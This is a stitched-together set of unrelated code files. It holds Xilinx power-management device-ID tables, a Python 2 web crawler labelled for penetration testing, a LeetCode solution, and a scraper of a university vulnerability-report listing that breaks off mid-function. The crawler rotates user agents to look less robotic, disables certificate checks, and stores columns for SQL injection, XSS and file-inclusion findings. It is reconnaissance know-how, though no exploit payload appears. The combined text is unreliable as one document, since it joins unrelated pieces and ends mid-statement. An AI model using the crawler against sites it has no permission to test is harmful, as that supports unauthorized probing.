def prealloc_detailed_policy(flags):
    """List every capability whose bit is set in flags, one name per set bit."""
    msg = "# Preallocation detailed: "
    caps = [
        "full access", "preserve context", "emit wake interrupts",
        "not usable", "secure access", "coherent access", "virtualized access"
    ]
    for index, name in enumerate(caps):
        if flags & (0x1 << index):
            msg += " " + name
    return msg
class Requirement:
    """Bundle of one subsystem->node requirement and its decoded policies."""

    def __init__(self, subsystem, node, prealloc, capability, nsregn_policy,
                 read_policy, write_policy, security, usage):
        self.subsystem = subsystem
        self.node = node
        self.prealloc = prealloc
        self.capability = capability
        self.nsregn_policy = nsregn_policy
        self.read_policy = read_policy
        self.write_policy = write_policy
        self.security = security
        self.usage = usage
def mem_regn_node(node_id):
    """Return True when bits 20..25 of *node_id* equal 0x3 (a memory-region node)."""
    return ((node_id >> 20) & 0x3F) == 0x3
# Device-tree node name -> EEMI device name, for nodes whose mapping is
# keyed on the node's unit address rather than a compatible string.
misc_devices = {
    "mailbox@ff320000": "PM_DEV_IPI_0",
    "mailbox@ff390000": "PM_DEV_IPI_1",
    "mailbox@ff310000": "PM_DEV_IPI_2",
    "mailbox@ff330000": "PM_DEV_IPI_3",
    "mailbox@ff340000": "PM_DEV_IPI_4",
    "mailbox@ff350000": "PM_DEV_IPI_5",
    "mailbox@ff360000": "PM_DEV_IPI_6",
    "watchdog@ff120000": "PM_DEV_SWDT_LPD",
}

# Memory device name -> base address of the backing memory.
# NOTE(review): all four OCM banks share one base address here -- presumably
# per-bank offsets are applied elsewhere; confirm before relying on this.
xlnx_pm_mem_node_to_base = {
    "PM_DEV_OCM_0": 0xff960000,
    "PM_DEV_OCM_1": 0xff960000,
    "PM_DEV_OCM_2": 0xff960000,
    "PM_DEV_OCM_3": 0xff960000,
    "PM_DEV_TCM_0_A": 0xffe00000,
    "PM_DEV_TCM_0_B": 0xffe20000,
    "PM_DEV_TCM_1_A": 0xffe90000,
    "PM_DEV_TCM_1_B": 0xffeb0000,
}
# EEMI device name -> 32-bit device id (values are unique; the reverse map
# below is the exact inverse of this table).
xlnx_pm_devname_to_id = {
    "PM_DEV_PLD_0": 0x18700000,
    "PM_DEV_PMC_PROC": 0x18104001,
    "PM_DEV_PSM_PROC": 0x18108002,
    "PM_DEV_ACPU_0": 0x1810c003,
    "PM_DEV_ACPU_1": 0x1810c004,
    "PM_DEV_RPU0_0": 0x18110005,
    "PM_DEV_RPU0_1": 0x18110006,
    "PM_DEV_OCM_0": 0x18314007,
    "PM_DEV_OCM_1": 0x18314008,
    "PM_DEV_OCM_2": 0x18314009,
    "PM_DEV_OCM_3": 0x1831400a,
    "PM_DEV_TCM_0_A": 0x1831800b,
    "PM_DEV_TCM_0_B": 0x1831800c,
    "PM_DEV_TCM_1_A": 0x1831800d,
    "PM_DEV_TCM_1_B": 0x1831800e,
    "PM_DEV_L2_BANK_0": 0x1831c00f,
    "PM_DEV_DDR_0": 0x18320010,
    "PM_DEV_USB_0": 0x18224018,
    "PM_DEV_GEM_0": 0x18224019,
    "PM_DEV_GEM_1": 0x1822401a,
    "PM_DEV_SPI_0": 0x1822401b,
    "PM_DEV_SPI_1": 0x1822401c,
    "PM_DEV_I2C_0": 0x1822401d,
    "PM_DEV_I2C_1": 0x1822401e,
    "PM_DEV_CAN_FD_0": 0x1822401f,
    "PM_DEV_CAN_FD_1": 0x18224020,
    "PM_DEV_UART_0": 0x18224021,
    "PM_DEV_UART_1": 0x18224022,
    "PM_DEV_GPIO": 0x18224023,
    "PM_DEV_TTC_0": 0x18224024,
    "PM_DEV_TTC_1": 0x18224025,
    "PM_DEV_TTC_2": 0x18224026,
    "PM_DEV_TTC_3": 0x18224027,
    "PM_DEV_SWDT_LPD": 0x18224028,
    "PM_DEV_SWDT_FPD": 0x18224029,
    "PM_DEV_OSPI": 0x1822402a,
    "PM_DEV_QSPI": 0x1822402b,
    "PM_DEV_GPIO_PMC": 0x1822402c,
    "PM_DEV_I2C_PMC": 0x1822402d,
    "PM_DEV_SDIO_0": 0x1822402e,
    "PM_DEV_SDIO_1": 0x1822402f,
    "PM_DEV_RTC": 0x18224034,
    "PM_DEV_ADMA_0": 0x18224035,
    "PM_DEV_ADMA_1": 0x18224036,
    "PM_DEV_ADMA_2": 0x18224037,
    "PM_DEV_ADMA_3": 0x18224038,
    "PM_DEV_ADMA_4": 0x18224039,
    "PM_DEV_ADMA_5": 0x1822403a,
    "PM_DEV_ADMA_6": 0x1822403b,
    "PM_DEV_ADMA_7": 0x1822403c,
    "PM_DEV_IPI_0": 0x1822403d,
    "PM_DEV_IPI_1": 0x1822403e,
    "PM_DEV_IPI_2": 0x1822403f,
    "PM_DEV_IPI_3": 0x18224040,
    "PM_DEV_IPI_4": 0x18224041,
    "PM_DEV_IPI_5": 0x18224042,
    "PM_DEV_IPI_6": 0x18224043,
    "PM_DEV_SOC": 0x18428044,
    "PM_DEV_DDRMC_0": 0x18520045,
    "PM_DEV_DDRMC_1": 0x18520046,
    "PM_DEV_DDRMC_2": 0x18520047,
    "PM_DEV_DDRMC_3": 0x18520048,
    "PM_DEV_GT_0": 0x1862c049,
    "PM_DEV_GT_1": 0x1862c04a,
    "PM_DEV_GT_2": 0x1862c04b,
    "PM_DEV_GT_3": 0x1862c04c,
    "PM_DEV_GT_4": 0x1862c04d,
    "PM_DEV_GT_5": 0x1862c04e,
    "PM_DEV_GT_6": 0x1862c04f,
    "PM_DEV_GT_7": 0x1862c050,
    "PM_DEV_GT_8": 0x1862c051,
    "PM_DEV_GT_9": 0x1862c052,
    "PM_DEV_GT_10": 0x1862c053,
    "PM_DEV_EFUSE_CACHE": 0x18330054,
    "PM_DEV_AMS_ROOT": 0x18224055,
    "PM_DEV_AIE": 0x18224072,
    "PM_DEV_IPI_PMC": 0x18224073,
}
# Reverse lookup: EEMI device id -> device name.
# Fix: this used to be a second hand-maintained 77-entry literal duplicating
# xlnx_pm_devname_to_id; deriving it keeps the two tables from drifting apart.
# Device ids are unique, so the inversion is lossless, and dict insertion
# order matches the forward table.
xlnx_pm_devid_to_name = {dev_id: name for name, dev_id in xlnx_pm_devname_to_id.items()}
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
from bs4 import BeautifulSoup
import re
from urlparse import urlparse
from urlparse import urljoin
from urlparse import urlunsplit
from urlparse import parse_qs
import os, sys
import timeit
import hashlib
import random
import sqlite3
import base64
import argparse
# drop table
def drop_table(table_name):
    # Drop `table_name` from the crawler DB if it exists; uses the module
    # globals `cur`/`conn` set up in main().  Python 2 code (print statements).
    # NOTE(review): table_name is interpolated into the SQL string -- safe only
    # because it comes from the command line, never from crawled content.
    try:
        query = "DROP table IF EXISTS %s" %(table_name)
        cur.execute(query)
        conn.commit()
        print "drop %s table" %(table_name)
    except Exception as e:
        print e
        print "can't drop %s table" %(table_name)
# create table
def create_table(table_name):
    # Create the results table: one row per URL with its response code,
    # optional body, and per-vulnerability columns filled in by later scans.
    try:
        query = "CREATE TABLE IF NOT EXISTS " + table_name + \
                "(id INTEGER PRIMARY KEY NOT NULL,"\
                "url text unique,"\
                "res_code text,"\
                "res_content text,"\
                "verb text,"\
                "admin text,"\
                "integer_overflow text,"\
                "buffer_overflow text,"\
                "sqli text,"\
                "xss text,"\
                "lfi text,"\
                "rfi text)"
        cur.execute(query)
        conn.commit()
        print "created %s table" %(table_name)
    except Exception as e:
        print e
        print "can't create %s table" %(table_name)
# insert the url, response code, and response content
# if you save response content, the size will grow up
def insert_data(url, res_code, res_content):
    # Insert the URL/status pair once; duplicate URLs are skipped.  Storing
    # the response body is commented out to keep the database small.
    try:
        cur.execute("select url from " + table_name + " where url == (?)", [url])
        if cur.fetchone() is None:
            cur.execute("insert into " + table_name + " (url, res_code) values(?, ?)", [url, res_code])
            # res_content = base64.b64encode(res_content)
            # cur.execute("insert into " + table_name + " (url, res_code, res_content) values(?, ?, ?)", [url, res_code, res_content])
            conn.commit()
            print "insert the %s" %(url)
        else:
            print "you already visited the %s" %(url)
    except Exception as e:
        print e
# after finish scanning, it will show the summary
def result_sumarize(table_name):
    # Return (urls, total, #200, #404, #500) aggregated from the results
    # table; returns None (implicitly) on failure.
    # NOTE(review): name is a typo for "summarize", but callers use it as-is.
    try:
        cur.execute("select count(url) from " + table_name)
        url_number = cur.fetchone()[0]
        cur.execute("select count(url) from " + table_name + " where res_code == '200'")
        res_code_200 = cur.fetchone()[0]
        cur.execute("select count(url) from " + table_name + " where res_code == '404'")
        res_code_404 = cur.fetchone()[0]
        cur.execute("select count(url) from " + table_name + " where res_code == '500'")
        res_code_500 = cur.fetchone()[0]
        cur.execute("select url from " + table_name)
        urls = []
        for row in cur:
            urls.append(row[0])
        return urls, url_number, res_code_200, res_code_404, res_code_500
    except Exception as e:
        print e
        pass
# extract url from form_tag
def scoop_forms_beautiful_soup(html_page_contents, url):
    """Collect absolute URLs built from the action attribute of every <form>."""
    url_scheme = urlparse(url)[0]
    url_location = urlparse(url)[1]
    # res_content = base64.b64decode(html_page_contents)
    # html_page_contents = unicode(html_page_contents, 'euc-kr').encode('utf-8')
    soup = BeautifulSoup(html_page_contents)
    actions = set([])
    for form in soup.findAll('form'):
        try:
            target = form["action"]
            if target:
                actions.add(urlunsplit((url_scheme, url_location, target, "", "")))
        except Exception:
            # forms without an action attribute are simply skipped
            pass
    return actions
# extract url from a tag
def scoop_hrefs_beautiful_soup(html_page_contents):
    """Return the href of every <a href=...> tag, or [] when parsing fails.

    Fix: the original used a bare ``except:``, which also swallows
    KeyboardInterrupt/SystemExit and so breaks Ctrl-C handling during a
    crawl; only parser failures should be ignored here.
    """
    links = []
    try:
        soup = BeautifulSoup(html_page_contents)
    except Exception:
        pass
    else:
        for tag in soup.findAll('a', href=True):
            links.append(tag['href'])
    return links
# Pre-compiled pattern matching <a href="..."> tags (case-insensitive).
href_regexp = re.compile('<a\s+href\s*?="\s*?(.*?)"', \
                         re.IGNORECASE | re.MULTILINE)

# extract href tag
def scoop_hrefs_regexp(html_page_contents):
    """Regex fallback: return every href value found in the raw page text."""
    matches = href_regexp.findall(html_page_contents)
    return matches
# union tags from scoop_forms_beautiful_soup and scoop_hrefs_beautiful_soup
def scoop_hrefs(html_page_contents, url):
    """Merge link candidates from the soup pass, the regex pass and <form> actions."""
    soup_links = set(scoop_hrefs_beautiful_soup(html_page_contents))
    regex_links = set(scoop_hrefs_regexp(html_page_contents))
    form_links = scoop_forms_beautiful_soup(html_page_contents, url)
    return soup_links | regex_links | form_links
# extract the domain name
def domain_name(url):
    """Return the network-location (host[:port]) component of *url*."""
    pieces = urlparse(url)
    return pieces[1]
# a.jsp -> http://test.com/a.jsp
def href2url(originating_page, href):
    # Resolve a (possibly relative) href against the page it appeared on,
    # returning an absolute URL, or "" when it cannot be parsed.
    # NOTE(review): `href.find("http") != -1` treats ANY href containing the
    # substring "http" (e.g. "page?next=http%3A//...") as already absolute;
    # startswith("http") is probably what was meant -- confirm before changing.
    # if href starts with http
    if href.find("http") != -1:
        href = href.strip()
        return href
    else:
        href = href.strip()
        try:
            pieces = urlparse(urljoin(originating_page, href))
        except Exception as e:
            # print e
            return ""
        url_scheme = pieces[0]
        url_location = pieces[1]
        url_path = pieces[2]
        url_parameter = pieces[3]
        url_query = pieces[4]
        # NOTE(review): urlunsplit expects (scheme, netloc, path, query,
        # fragment); the params field ends up in the fragment slot here --
        # the toggled comments below suggest this was deliberate, but verify.
        # don't follw http://www.google.com/q=test
        # return urlunsplit((url_scheme, url_location, url_path, "", ""))
        # follw http://www.google.com/q=test
        return urlunsplit((url_scheme, url_location, url_path, url_query, url_parameter))
def extract_all_href_links(page_contents, url_matching_pattern):
    """Resolve every link found on the page and keep only absolute http(s)
    links whose host contains the base host."""
    base_host = urlparse(url_matching_pattern)[1]
    absolute_links = set([])
    for raw_link in scoop_hrefs(page_contents, url_matching_pattern):
        candidate = href2url(url_matching_pattern, raw_link)
        # the host check drops share widgets such as
        # facebook.com/sharer/sharer.php?...p[url]=http%3A%2F%2Fwww.test.com...
        if candidate.startswith('http') and urlparse(candidate)[1].find(base_host) != -1:
            absolute_links.add(candidate)
    return absolute_links
def file_extension(filename):
    """Return the extension of *filename* without the dot, or '' if none."""
    ext = os.path.splitext(filename)[1]
    return '' if ext in ('.', '') else ext[1:]
# File extensions the crawler must NOT follow (documents, media, binaries).
# Fix: the original had a missing comma after 'm21', so Python's implicit
# string concatenation silently fused it with 'mj2' into the single entry
# 'm21mj2' -- neither real extension was filtered.
terminal_extensions = {
    # text file extensions
    'doc', 'docx', 'log', 'msg', 'pages', 'rtf', 'tt', 'wpd', 'wps', 'css',
    # data file extensions
    'accdb', 'blg', 'dat', 'db', 'efx', 'mdb', 'pdb', 'pps', 'ppt',
    'pptx', 'sdb', 'sdf', 'sql', 'vcf', 'wks', 'xls', 'xlsx',
    # image file extensions
    'bmp', 'gif', 'jpg', 'png', 'psd', 'psp', 'thm', 'tif', 'tiff',
    'ai', 'drw', 'eps', 'ps', 'svg',
    '3dm', 'dwg', 'dxf', 'pln',
    'indd', 'pct', 'pdf', 'qxd', 'qxp', 'rels',
    # audio file extensions
    'aac', 'aif', 'iff', 'm3u', 'mid', 'mp3', 'mpa', 'ra', 'wav', 'wma',
    # video file extensions
    '3g2', '3gp', 'asf', 'asx', 'avi', 'flv', 'mov', 'mp4', 'mpg',
    'rm', 'swf', 'vob', 'wmv',
    # executable file extensions
    'sys', 'dmp', 'app', 'bat', 'cgi', 'exe', 'pif', 'vb', 'ws',
    # compressed file extensions
    'deb', 'gz', 'pkg', 'rar', 'sit', 'sitx', 'tar', 'zip', 'zipx',
    # programming file extensions
    'c', 'cc', 'cpp', 'h', 'hpp', 'java', 'pl', 'f', 'for',
    # misc file extensions
    'dbx', 'msi', 'part', 'torrent', 'yps', 'dmg', 'iso', 'vcd',
    # more_audio_file_extensions
    '4mp', 'aa3', 'abc', 'adg', 'aifc', 'aiiff',
    'awb', 'cda', 'cdib', 'dcm', 'dct', 'dfc', 'efa', 'f64', 'flac',
    'flp', 'g726', 'gnt', 'imy', 'kfn', 'm4a', 'm4p', 'm4r',
    'midi', 'mio', 'mmf', 'mpu', 'msv', 'mt2',
    'mte', 'mtp', 'mzp', 'oga', 'ogg', 'omg', 'pvc', 'ram',
    'rif', 'ul', 'usm', 'vox',
    # data_backup_file_extensions
    'abbu', 'alub', 'asd', 'bac', 'bak', 'bbb', 'bks', 'bup', 'dkb',
    'dov', 'bk', 'nbf', 'qbb', 'qbk', 'tmp', 'xlf',
    # video_file_extensions
    'aaf', 'cvc', 'ddat', 'divx', 'dmb', 'dv',
    'evo', 'f4v', 'flc', 'fli', 'giv', 'm1pg', 'm21',
    'mj2', 'mjp', 'mp4v', 'mpeg', 'mpeg4', 'mpg2',
    'mts', 'svi', 'tivo', 'wmmp',
}
def has_http_in_path(url):
    """True when 'http' occurs inside the path or params component,
    i.e. the URL embeds another URL."""
    pieces = urlparse(url)
    return 'http' in pieces[2] or 'http' in pieces[3]
def decide_which_links_to_follow(terminal_extensions, page_links):
    """Filter crawl candidates: keep links that match the target pattern,
    are not terminal file types, and do not embed another URL."""
    keep = set([])
    for candidate in page_links:
        if candidate.find(cononical_url) == -1:
            continue  # off-target host
        if file_extension(candidate).lower() in terminal_extensions:
            continue  # binary/media resource -- nothing to parse
        if has_http_in_path(candidate):
            continue  # URL embedded in the path; likely a redirector
        keep.add(candidate)
    return keep
def add_links_to_frontier_1(page_links, links_to_visit):
    # Mark a single URL (despite the plural parameter name) as visited.
    links_to_visit.add(page_links)
    return links_to_visit
def add_links_to_frontier_2(page_links, url_matching_pattern):
    """Map the originating URL to the list of links discovered on it."""
    pending = {url_matching_pattern: []}
    for link in page_links:
        pending[url_matching_pattern].append(link)
    return pending
def add_links_to_frontier_3(page_contents_enc, links_to_visit_enc):
    """Record a page-content fingerprint; non-string values are ignored.

    Improvements: ``isinstance`` replaces the exact ``type() == str``
    comparison (accepts str subclasses), and the duplicated return
    statement is collapsed into one.
    """
    if isinstance(page_contents_enc, str):
        links_to_visit_enc.add(page_contents_enc)
    return links_to_visit_enc
def add_links_to_frontier_4(page_links, links_to_visit_params):
    # Record a path+sorted-param-names signature so URLs that differ only in
    # parameter values are crawled once.
    links_to_visit_params.add(page_links)
    return links_to_visit_params

def add_404_pages(page_links, page_code_404):
    # Remember a URL that answered 404.
    page_code_404.add(page_links)
    return page_code_404

def add_500_pages(page_links, page_code_500):
    # Remember a URL that answered 500.
    page_code_500.add(page_links)
    return page_code_500
def make_baseurl(url):
    """Strip the last path segment: http://h/a/b.html -> http://h/a/."""
    pieces = urlparse(url)
    dir_path = pieces[2][:pieces[2].rfind("/") + 1]
    return urlunsplit((pieces[0], pieces[1], dir_path, '', ''))
def done_check(links_not_to_visit, links_to_visit):
    """True when every discovered link has already been visited."""
    return all(link in links_to_visit
               for found_links in links_not_to_visit.values()
               for link in found_links)
def array_to_string(arrays):
    """Join list items with CRLF.  Note: commas *inside* items are also
    converted, because the items are first comma-joined, then replaced."""
    if not arrays:
        return ""
    joined = ','.join(arrays)
    return joined.replace(",", "\r\n")
def get_all_links(url, url_matching_pattern, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params):
    # Fetch `url`, record it in the DB, and return the next crawl frontier as
    # a 6-tuple: (links_not_to_visit, links_to_visit, links_to_visit_enc,
    # page_code_404, page_code_500, links_to_visit_params).
    # Rotate through desktop user agents so the crawl looks less robotic.
    user_agents = ["Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36", \
                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", \
                   "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36", \
                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", \
                   "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0", \
                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", \
                   "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", \
                   "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
                   ]
    try:
        payloads = parse_qs(urlparse(url).query)
        # from {u'action': [u'M01']} to {u'action': u'M01'}
        for name in payloads.keys():
            payloads[name] = payloads[name][0]
        # test.com/goods_list.php?Index=291 -> /goods_list.php['Index']
        url_with_params = str(urlparse(url)[2]) + str(sorted(payloads.keys()))
        links_to_visit_params = add_links_to_frontier_4(url_with_params, links_to_visit_params)
        links_to_visit = add_links_to_frontier_1(url, links_to_visit)
        # cookie check
        if cookie is None:
            res = requests.get(url,\
                               timeout = 0.8,\
                               headers = {"User-Agent" : random.choice(user_agents)},\
                               verify = False)
        else:
            res = requests.get(url,\
                               timeout = 0.8,\
                               headers = {"User-Agent" : random.choice(user_agents),\
                                          "Cookie" : cookie},\
                               verify = False)
        res_contents = res.content
        res_code = res.status_code
        insert_data(url, str(res_code), res_contents)
        if (res_code == 200):
            # sha1 fingerprint of the body, used to skip duplicate content
            page_contents_enc = hashlib.sha1(res_contents).digest().encode("hex")
            if page_contents_enc not in links_to_visit_enc:
                links_to_visit_enc = add_links_to_frontier_3(page_contents_enc, links_to_visit_enc)
                url_base = make_baseurl(url_matching_pattern)
                page_links = extract_all_href_links(res_contents, url_base)
                follow_links = decide_which_links_to_follow(terminal_extensions, page_links)
                links_not_to_visit = add_links_to_frontier_2(follow_links, url)
                return links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
            else:
                # duplicate content: nothing new to follow
                return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
        elif res_code == 404:
            page_code_404 = add_404_pages(url, page_code_404)
            return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
        elif res_code == 500:
            page_code_500 = add_500_pages(url, page_code_500)
            return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
        else:
            return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
    except (KeyboardInterrupt, SystemExit):
        # Ctrl-C: print the summary collected so far, then exit.
        urls, url_number, res_code_200, res_code_404, res_code_500 = result_sumarize(table_name)
        cur.close()
        end_time = timeit.default_timer()
        print "*" * 120
        for url in urls:
            print url
        print "*" * 120
        print "the number of all url is %s" % (url_number)
        print "the number of url with code 200 is %s" % (res_code_200)
        print "the number of url with code 404 is %s" % (res_code_404)
        print "the number of url with code 500 is %s" % (res_code_500)
        print '\nwebcrwal is done: ', end_time - start_time
        sys.exit(0)
    except Exception as e:
        # Network errors/timeouts: treat this URL as a dead end and continue.
        return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
    else:
        # Unreachable in practice: every branch of the try body returns.
        return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
def not_to_visit_urls(links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params):
    # Visit every not-yet-visited link in `links_not_to_visit` and collect
    # the next frontier.  Always returns the same 6-tuple shape as
    # get_all_links().
    #
    # Fix: the early return for an empty frontier only returned 3 values,
    # while the caller in main() unpacks 6 -- as soon as a crawl step
    # produced an empty frontier this raised "ValueError: not enough values
    # to unpack".  Return all 6 accumulators instead.
    if links_not_to_visit == {}:
        return links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
    links_not_to_visit_new = {}
    for link_key in links_not_to_visit.keys():
        for link in links_not_to_visit[link_key]:
            if link not in links_to_visit:
                url = link
                payloads = parse_qs(urlparse(url).query)
                # from {u'action': [u'M01']} to {u'action': u'M01'}
                for name in payloads.keys():
                    payloads[name] = payloads[name][0]
                # test.com/goods_list.php?Index=291 -> /goods_list.php['Index']
                url_with_params = str(urlparse(url)[2]) + str(sorted(payloads.keys()))
                if url_with_params not in links_to_visit_params:
                    # ex) index.do?m=A01 and index.do?m=A01 are totally different
                    # change it to "if url_with_params not in {}:"
                    url = link
                    url_matching_pattern = make_baseurl(url)
                    results = get_all_links(url, url_matching_pattern, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params)
                    links_not_to_visit_new = dict(results[0], **links_not_to_visit_new)
                    links_to_visit = results[1]
                    links_to_visit_enc = results[2]
                    page_code_404 = results[3]
                    page_code_500 = results[4]
                    links_to_visit_params = results[5]
    return links_not_to_visit_new, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
def main():
    # Parse CLI options, (re)create the results table, then crawl
    # breadth-first from the start URL until no unvisited links remain.
    usage = '''./web_crwaler.py -u http://www.google.com -p google.com -t google'''
    parser = argparse.ArgumentParser(description = "url crwaler for pen testing", \
                                     usage = usage)
    parser.add_argument("-u", "--url", required=True, help="target domain")
    parser.add_argument("-p", "--pattern", required=True, help="string to find target domain")
    parser.add_argument("-c", "--cookie", required=False, help="cookie")
    parser.add_argument("-m", "--modify", required=False, help="update the result from previsous table, ex)-u yes")
    parser.add_argument("-t", "--table", required=True, help="table name")
    parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.0 (04/19/2014)')
    args = parser.parse_args()
    # Shared crawl state lives in module globals so the helpers can reach it.
    global cononical_url
    # cononical_url = "192.168.10.9"
    global table_name
    # table_name = "wavsep"
    url_to_start = args.url
    cononical_url = args.pattern
    table_name = args.table
    update_table = args.modify
    global cookie
    cookie_filename = args.cookie
    # -c names a FILE containing the cookie string, not the cookie itself.
    try:
        f = open(cookie_filename).read()
        cookie = str(f).strip()
    except:
        cookie = None
    global conn
    conn = sqlite3.connect("crawler.db")
    conn.text_factory = str
    global cur
    cur = conn.cursor()
    global start_time
    start_time = timeit.default_timer()
    # url_to_start ="http://192.168.10.9:8080/active/"
    url_matching_pattern = url_to_start
    links_not_to_visit = {}
    links_to_visit = set([])
    # In update mode, pre-seed the visited set from the existing table.
    if update_table:
        cur.execute("select url from " + table_name)
        for row in cur:
            links_to_visit.add(row[0])
    links_to_visit_enc = set([])
    links_to_visit_params = set([])
    page_code_404 = set([])
    page_code_500 = set([])
    if not update_table:
        drop_table(table_name)
    create_table(table_name)
    # Seed the frontier with the start URL.
    results = get_all_links(url_to_start,\
                            url_matching_pattern,\
                            links_to_visit,\
                            links_to_visit_enc,\
                            page_code_404,\
                            page_code_500,\
                            links_to_visit_params
                            )
    links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params = results
    # Expand the frontier until nothing new appears, then print the summary.
    while True:
        links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params = not_to_visit_urls(links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params)
        if done_check(links_not_to_visit, links_to_visit):
            urls, url_number, res_code_200, res_code_404, res_code_500 = result_sumarize(table_name)
            cur.close()
            end_time = timeit.default_timer()
            print "*" * 120
            for url in urls:
                print url
            print "*" * 120
            print "the number of all url is %s" % (url_number)
            print "the number of url with code 200 is %s" % (res_code_200)
            print "the number of url with code 404 is %s" % (res_code_404)
            print "the number of url with code 500 is %s" % (res_code_500)
            print '\nwebcrwal is done: ', end_time - start_time
            sys.exit()
if __name__ == "__main__":
main() |
class Solution:
    def smallerNumbersThanCurrent(self, nums: List[int]) -> List[int]:
        """For each element, count how many elements of nums are strictly smaller.

        Values are constrained to 0..100, so a counting sort plus a running
        prefix sum answers every query in O(1).  This replaces the original
        sum(dic[0:n]) per element, which re-summed a histogram slice for
        every value (O(n * 101) -> O(n + 101)).
        """
        counts = [0] * 101
        for value in nums:
            counts[value] += 1
        # smaller[v] = number of elements strictly less than v
        smaller = [0] * 102
        for v in range(101):
            smaller[v + 1] = smaller[v] + counts[v]
        return [smaller[value] for value in nums]
|
# -*- coding:utf-8 -*-
# by:kracer
import re
import requests
import time
from threading import *
from multiprocessing import Process
from bs4 import BeautifulSoup as bs
import matplotlib.pyplot as plt
# Base listing URL of the SJTU vulnerability platform; the page number is appended.
url0 = "https://src.sjtu.edu.cn/list/?page="
# Ranked per-submitter / per-school tallies, filled in by process().
submitter_index_dic, edu_index_dic = {}, {}
datas = []  # rows scraped by the crawler (each row: [title, submitter, severity])
# Vulnerability category labels searched for in report titles.
bug_name = ["SQL", "CSRF", "SSRF", "XSS", "代码执行", "其他", "命令执行", "垂直权限", "弱口令", "敏感信息", "文件上传", "水平权限", "点击劫持"]
lock = Lock()
# Scrape report rows from the platform listing pages into edusrc.txt.
def getData(a, num):
    # Fetch pages (num + a - 300) .. a and append "title \t submitter \t
    # severity" lines to edusrc.txt.
    # NOTE(review): every worker opens the SAME file with mode 'w+', so
    # concurrent workers truncate each other's output -- confirm whether one
    # file per worker (or an append mode + lock) was intended.
    # NOTE(review): the page window assumes a 300-page slice, but Th() hands
    # out 100-page slices -- the two fan-out helpers disagree; verify.
    with open(r'edusrc.txt', 'w+', encoding='utf-8') as f:
        for page in range((num + a - 300), (a+1)):
            url = url0 + str(page)
            r = requests.get(url=url)
            r.encoding = r.apparent_encoding
            soup = bs(r.text, 'lxml')
            result = soup.find_all(name='tr', attrs={'class':'row'})
            soup1 = bs(str(result), 'lxml')
            result0 = soup1.find_all(name='a')  # raw <a> tag data
            result1 = [i.string for i in result0]
            result1_new = []  # report titles (school + vulnerability name), via regex
            for i in range(len(result1)):
                if(i%2 == 0):
                    text = re.findall(r'(\w.*)', result1[i])
                    result1_new.append(text[0])
                else:
                    continue
            result2 = re.findall(r'<a.+>(.*)</a>', str(result0))  # submitter names, via regex
            result3 = soup1.find_all(name='span')  # severity labels (high/low/...)
            result3 = [i.string for i in result3]
            for i in range(len(result1_new)):  # append the rows to the txt file
                f.write(str(result1_new[i]) + '\t' + str(result2[i]) + '\t' + str(result3[i]) + '\n')
# Fan the scrape out over 20 threads, each covering a 100-page slice.
def Th(fuc, num):
    """Run fuc(100*i, num) for i in 1..20 on worker threads and wait for all."""
    workers = [Thread(target=fuc, args=(100 * i, num,)) for i in range(1, 21)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
# Fan the scrape out over 10 processes, each covering a 300-page slice.
def Pr(fuc, num):
    """Run fuc(300*i, num) for i in 1..10 in worker processes and wait for all."""
    workers = [Process(target=fuc, args=(300 * i, num,)) for i in range(1, 11)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
# Post-process the scraped rows into ranked per-school / per-submitter tallies.
def process():
    # NOTE(review): `edu_index_list` in this global statement exists nowhere in
    # the module (the real global is `edu_index_dic`); harmless only because
    # the name is never assigned here -- confirm and fix the declaration.
    global datas, edu_index_list, submitter_index_dic
    times = 0
    edu_dic, submitter_dic = {}, {}
    with open('edusrc.txt', 'r+', encoding='utf-8') as f:
        for i in f.readlines():
            i.rstrip('\n')  # NOTE(review): no-op -- the stripped copy is discarded
            lis = i.split('\t')
            if len(lis) == 3:  # skip malformed rows
                datas.append(i.split('\t'))
                submitter_dic.setdefault(datas[times][1], {})  # outer key: submitter name
                submitter_dic[datas[times][1]].setdefault(datas[times][2].rstrip('\n'), 0)  # inner key: severity, start at 0
                submitter_dic[datas[times][1]][datas[times][2].rstrip('\n')] += 1  # bump this submitter's severity count
                try:
